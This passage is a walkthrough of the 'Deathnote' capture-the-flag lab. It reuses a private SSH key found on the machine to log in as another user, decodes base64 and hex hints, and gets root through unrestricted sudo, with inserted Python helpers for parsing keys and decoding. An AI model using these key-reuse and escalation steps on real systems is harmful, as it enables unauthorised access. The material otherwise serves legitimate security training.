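def parse_pubkey_line(line: str) -> dict:
    """Parse 'keytype base64blob [comment]' and decode the blob's wire format."""
    parts = line.strip().split(None, 2)
    if len(parts) < 2:
        raise ValueError("not an OpenSSH public key line")
    keytype, b64 = parts[0], parts[1]
    comment = parts[2] if len(parts) == 3 else ""
    blob = base64.b64decode(b64, validate=True)
    wire_type, off = _read_string(blob, 0)
    if wire_type.decode("ascii") != keytype:
        raise ValueError("key type field disagrees with blob")
    info = {"type": keytype, "comment": comment, "blob": blob,
            "fingerprint": fingerprint(blob)}
    if keytype == "ssh-rsa":
        # ssh-rsa blob layout (RFC 4253 6.6): string "ssh-rsa", mpint e, mpint n
        e, off = _read_string(blob, off)
        n, off = _read_string(blob, off)
        info["exponent"] = int.from_bytes(e, "big")
        info["bits"] = int.from_bytes(n, "big").bit_length()
    return info


def authorized_keys_entries(text: str):
    """Yield parsed entries from an authorized_keys file.

    Skips blank and comment lines and strips leading options such as
    from="..." (simple case: options without quoted spaces).
    """
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        for i, tok in enumerate(tokens):
            if tok.startswith(("ssh-", "ecdsa-", "sk-")):
                yield parse_pubkey_line(" ".join(tokens[i:]))
                break


def matching_entries(authorized_keys: str, candidate_pub: str) -> list:
    """Fingerprints of entries whose key blob equals the candidate's blob."""
    cand = parse_pubkey_line(candidate_pub)
    return [e["fingerprint"] for e in authorized_keys_entries(authorized_keys)
            if e["blob"] == cand["blob"]]


def _altered_copy(pub_line: str) -> str:
    """Constructed negative case: same structure, last modulus byte flipped."""
    info = parse_pubkey_line(pub_line)
    blob = bytearray(info["blob"])
    blob[-1] ^= 0x01
    return f"{info['type']} {base64.b64encode(bytes(blob)).decode()} other@host"


OTHER_KEY = _altered_copy(KIRA_AUTHORIZED_KEYS)

if __name__ == "__main__":
    kira = parse_pubkey_line(KIRA_AUTHORIZED_KEYS)
    print(f"{kira['type']} {kira['bits']} bits, e={kira['exponent']}, "
          f"{kira['fingerprint']} ({kira['comment']})")
    # Same key with a different comment still matches; a different key does not
    print(matching_entries(KIRA_AUTHORIZED_KEYS,
                           KIRA_AUTHORIZED_KEYS.replace("l@deathnote", "anyone")))
    print(matching_entries(KIRA_AUTHORIZED_KEYS, OTHER_KEY))
```

On the target the same check is `ssh-keygen -lf ~/.ssh/id_rsa.pub` compared with `ssh-keygen -lf /home/kira/.ssh/authorized_keys`: identical fingerprints mean the private key next to that .pub file will be accepted for kira, whatever the comment says.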

l@deathnote:/home/kira/.ssh$ cd /home/l
l@deathnote:~$ ls -al                                                                                                 
total 36                                                                                                                        
drwxr-xr-x 4 l    l    4096 Sep  4  2021 .                                                                                      
drwxr-xr-x 4 root root 4096 Jul 19  2021 ..                                                                                     
-rw------- 1 l    l       0 Sep  4  2021 .bash_history                                                                          
-rw-r--r-- 1 l    l     220 Jul 19  2021 .bash_logout                                                                           
-rw-r--r-- 1 l    l    3526 Jul 19  2021 .bashrc                                                                                                                                                              
drwxr-xr-x 3 l    l    4096 Jul 19  2021 .local                                                                                 
-rw-r--r-- 1 l    l     807 Jul 19  2021 .profile                                                                               
drwxr-xr-x 2 l    l    4096 Jul 19  2021 .ssh 
-rw-r--r-- 1 root root  807 Jul 19  2021 user.txt                                                                                   
l@deathnote:~$ 

l's .ssh directory already holds the key pair: id_rsa (mode 600, as sshd requires for a private key) and id_rsa.pub of the same 393 bytes as kira's entry. The following steps create an authorized_keys file under l's own .ssh with vi and paste kira's entry into it; note that this has no effect on logging in as kira, because sshd consults the target account's authorized_keys, not the connecting user's.

l@deathnote:~/.ssh$ ls -al
total 24
drwx------ 2 l l 4096 Sep  8 07:23 .
drwxr-xr-x 4 l l 4096 Sep  4  2021 ..
-rw------- 1 l l 1823 Jul 19  2021 id_rsa
-rw-r--r-- 1 l l  393 Jul 19  2021 id_rsa.pub
-rw-r--r-- 1 l l  444 Sep  8 07:25 known_hosts
l@deathnote:~/.ssh$ vi authorized_keys

We can verify the content with cat:

l@deathnote:~/.ssh$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDyiW87OWKrV0KW13eKWJir58hT8IbC6Z61SZN
h4Yzm9XlfTcCytDH56uhDOqtMR6jVzs9qCSXGQFLhc6IMPF69YMiK9yTU5ahT8LmfO0ObqSfSAG
HaS0i5A73pxlqUTHHrzhB3/Jy93n0NfPqOX7HGkLBasYR0v/IreR74iiBI0JseDxyrZCLcl6h9V
0WiU0mjbPNBGOffz41CJN78y2YXBuUliOAj/6vBi+wMyFF3jQhP4Su72ssLH1n/E2HBimD0F75m
i6LE9SNuI6NivbJUWZFrfbQhN2FSsIHnuoLIJQfuFZsQtJsBQ9d3yvTD2k/POyhURC6MW0V/aQI
CFZ6z l@deathnote
l@deathnote:~/.ssh$

An authorized_keys file never needs the execute bit: sshd only requires it to be readable by its owner and not writable by group or others (600 or 644 are both fine). The chmod below is therefore harmless but unnecessary; the permission that matters is 600 on id_rsa, which the listing already shows.

l@deathnote:~/.ssh$ ls -al
total 24
drwx------ 2 l l 4096 Sep  8 07:23 .
drwxr-xr-x 4 l l 4096 Sep  4  2021 ..
-rw-r--r-- 1 l l  393 Sep  8 07:23 authorized_keys
-rw------- 1 l l 1823 Jul 19  2021 id_rsa
-rw-r--r-- 1 l l  393 Jul 19  2021 id_rsa.pub
-rw-r--r-- 1 l l  444 Sep  8 07:25 known_hosts
l@deathnote:~/.ssh$ chmod +x authorized_keys 
l@deathnote:~/.ssh$

Now use the ssh client to log in as the user Kira.

l@deathnote:~/.ssh$ ssh [email protected]
Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep  4 06:00:09 2021 from 127.0.0.1
kira@deathnote:~$

We have successfully switched to the user Kira, who is allowed to read the “kira.txt” file.

kira@deathnote:~$ ls -al
total 32
drwxr-xr-x 4 kira kira 4096 Sep  4  2021 .
drwxr-xr-x 4 root root 4096 Jul 19  2021 ..
-rw------- 1 kira kira    0 Sep  4  2021 .bash_history
-rw-r--r-- 1 kira kira  220 Jul 19  2021 .bash_logout
-rw-r--r-- 1 kira kira 3526 Jul 19  2021 .bashrc
-rwx------ 1 kira root   85 Aug 29  2021 kira.txt
drwxr-xr-x 3 kira kira 4096 Jul 19  2021 .local
-rw-r--r-- 1 kira kira  807 Jul 19  2021 .profile
drwxr-xr-x 2 kira kira 4096 Jul 19  2021 .ssh
kira@deathnote:~$ cat kira.txt  
cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp                                            
kira@deathnote:~$

This file contains what looks like base64-encoded text. Let me decode it.

kira@deathnote:~$ echo "cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp" | base64 -d
please protect one of the following                                                                                             
1. L (/opt)                                                                                                                     
2. Misa (/var)
kira@deathnote:~$

The decoded note points at the “/opt” directory, which might contain something interesting. Let me change into it and list the files and directories.

kira@deathnote:~$ cd /opt/                                                                                        
kira@deathnote:/opt$ ls -al                                                                                                     
total 12                                                                                                                        
drwxr-xr-x  3 root root 4096 Aug 29  2021 .                                                                                     
drwxr-xr-x 18 root root 4096 Jul 19  2021 ..                                                                                    
drwxr-xr-x  4 root root 4096 Aug 29  2021 L                                                                                     
kira@deathnote:/opt$

It holds another directory, L. Let me change into it.

kira@deathnote:/opt$ cd L                                                                                                       
kira@deathnote:/opt/L$ ls -al                                                                                                   
total 16                                                                                                                        
drwxr-xr-x 4 root root 4096 Aug 29  2021 .                                                                                      
drwxr-xr-x 3 root root 4096 Aug 29  2021 ..
drwxr-xr-x 2 root root 4096 Aug 29  2021 fake-notebook-rule
drwxr-xr-x 2 root root 4096 Aug 29  2021 kira-case
kira@deathnote:/opt/L$

Directory L contains two more directories. Let’s have a look at the "fake-notebook-rule" directory first.

kira@deathnote:/opt/L$ cd fake-notebook-rule/
kira@deathnote:/opt/L/fake-notebook-rule$ ls -al
total 16
drwxr-xr-x 2 root root 4096 Aug 29  2021 .
drwxr-xr-x 4 root root 4096 Aug 29  2021 ..
-rw-r--r-- 1 root root   84 Aug 29  2021 case.wav
-rw-r--r-- 1 root root   15 Aug 29  2021 hint
kira@deathnote:/opt/L/fake-notebook-rule$

The "fake-notebook-rule" directory contains two files: case.wav, apparently an audio file, and hint, a text file. Let me read the hint.

kira@deathnote:/opt/L/fake-notebook-rule$ cat hint 
use cyberchef

kira@deathnote:/opt/L/fake-notebook-rule$

The hint tells us to use CyberChef, which suggests there is encoded text here that we need to decode.

CyberChef - Cyber Swiss Army Knife

CyberChef is an open-source web application designed to handle various cybersecurity tasks, serving as a "Swiss Army Knife" for cyber analysts and security professionals. It provides a wide range of operations, including encoding, decoding, encryption, decryption, compression, decompression, and data analysis. CyberChef offers a visual interface where users can chain together different operations to manipulate data and analyze it efficiently. It is particularly useful for tasks such as data transformation, reverse engineering, and cryptanalysis.


Let me run the file utility to determine the actual file type:

kira@deathnote:/opt/L/fake-notebook-rule$ file case.wav 
case.wav: ASCII text
kira@deathnote:/opt/L/fake-notebook-rule$

So “case.wav” is not an audio file but a text file. Let me print it with the cat command.

kira@deathnote:/opt/L/fake-notebook-rule$ cat case.wav 
63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d
kira@deathnote:/opt/L/fake-notebook-rule$

The “case.wav” file holds a sequence of hexadecimal byte values, which CyberChef can decode. The decoded output is itself base64-encoded, so decode it once more. The fully decoded text reveals the password for the user Kira.
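As an added example (not from the walkthrough), the two decodings used on this machine, the base64 in kira.txt and the hex-then-base64 in case.wav, done in Python with a small helper that peels encoding layers until plain text remains; it generalises the two cases to any depth of hex/base64 nesting, and the helper names are my own:

```python
import base64
import binascii
import re
import string

# Constructed copies of the two encoded strings shown in the walkthrough.
KIRA_TXT = ("cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQp"
            "CjIuIE1pc2EgKC92YXIp")
CASE_WAV = ("63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a "
            "5a 58 5a 70 62 43 41 3d")

HEX_RE = re.compile(r"^(?:[0-9a-fA-F]{2}\s*)+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
PRINTABLE = set(string.printable)

def _as_text(raw: bytes):
    """Accept a layer only if it decodes to printable ASCII; otherwise None."""
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if all(ch in PRINTABLE for ch in text) else None

def peel_layer(data: str):
    """Strip one encoding layer, returning (layer_name, text) or None.
    Hex is tried first because a short hex string is also valid base64."""
    s = data.strip()
    if HEX_RE.match(s):
        text = _as_text(bytes.fromhex(re.sub(r"\s+", "", s)))
        if text is not None:
            return "hex", text
    if B64_RE.match(s) and len(s) % 4 == 0:
        try:
            text = _as_text(base64.b64decode(s, validate=True))
        except binascii.Error:
            text = None
        if text is not None:
            return "base64", text
    return None

def decode_layers(blob: str, max_depth: int = 5):
    """Peel layers until plain text remains; returns (layer names, text)."""
    layers, current = [], blob
    for _ in range(max_depth):
        step = peel_layer(current)
        if step is None:
            break
        layers.append(step[0])
        current = step[1]
    return layers, current
```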

Run sudo -l to list the commands the invoking user is allowed (and forbidden) to run on the current host.

kira@deathnote:/opt/L/fake-notebook-rule$ sudo -l                                                                               
[sudo] password for kira:                                                                                                       
Matching Defaults entries for kira on deathnote:                                                                                
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin                      
                                                                                                                                
User kira may run the following commands on deathnote:                                                                          
    (ALL : ALL) ALL                                                                                                             
kira@deathnote:/opt/L/fake-notebook-rule$ 

Kira may run any command as any user through sudo, which means we can escalate to root. To obtain the root flag, switch to root and change to the /root directory.

kira@deathnote:/opt/L/fake-notebook-rule$ cd /root                                                                              
bash: cd: /root: Permission denied                                                                                              
kira@deathnote:/opt/L/fake-notebook-rule$ sudo su
root@deathnote:/opt/L/fake-notebook-rule# cd /root
root@deathnote:~# ls 
root.txt
root@deathnote:~# cat root.txt 


      ::::::::       ::::::::       ::::    :::       ::::::::       :::::::::           :::    :::::::::::       :::::::: 
    :+:    :+:     :+:    :+:      :+:+:   :+:      :+:    :+:      :+:    :+:        :+: :+:      :+:          :+:    :+: 
   +:+            +:+    +:+      :+:+:+  +:+      +:+             +:+    +:+       +:+   +:+     +:+          +:+         
  +#+            +#+    +:+      +#+ +:+ +#+      :#:             +#++:++#:       +#++:++#++:    +#+          +#++:++#++   
 +#+            +#+    +#+      +#+  +#+#+#      +#+   +#+#      +#+    +#+      +#+     +#+    +#+                 +#+    
#+#    #+#     #+#    #+#      #+#   #+#+#      #+#    #+#      #+#    #+#      #+#     #+#    #+#          #+#    #+#     
########       ########       ###    ####       ########       ###    ###      ###     ###    ###           ########       

##########follow me on twitter###########3
and share this screen shot and tag @KDSAMF
root@deathnote:~# 

Congratulations! We obtained both flags.
